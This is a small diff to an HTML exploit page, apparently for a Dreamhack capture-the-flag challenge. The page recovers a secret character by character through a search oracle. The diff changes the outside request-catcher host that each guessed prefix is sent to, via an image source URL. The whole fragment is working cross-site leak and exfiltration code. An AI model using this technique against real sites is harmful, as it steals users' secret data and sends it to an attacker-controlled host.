--- a/exserver.html
+++ b/exserver.html
@@ -35,7 +35,7 @@
             for (let c of chars) {
                 if (await search(secret + c)) {
                     secret += c;
-                    img.src = `https://ffhxdeq.request.dreamhack.games/${secret}`;
+                    img.src = `https://enmexkr.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
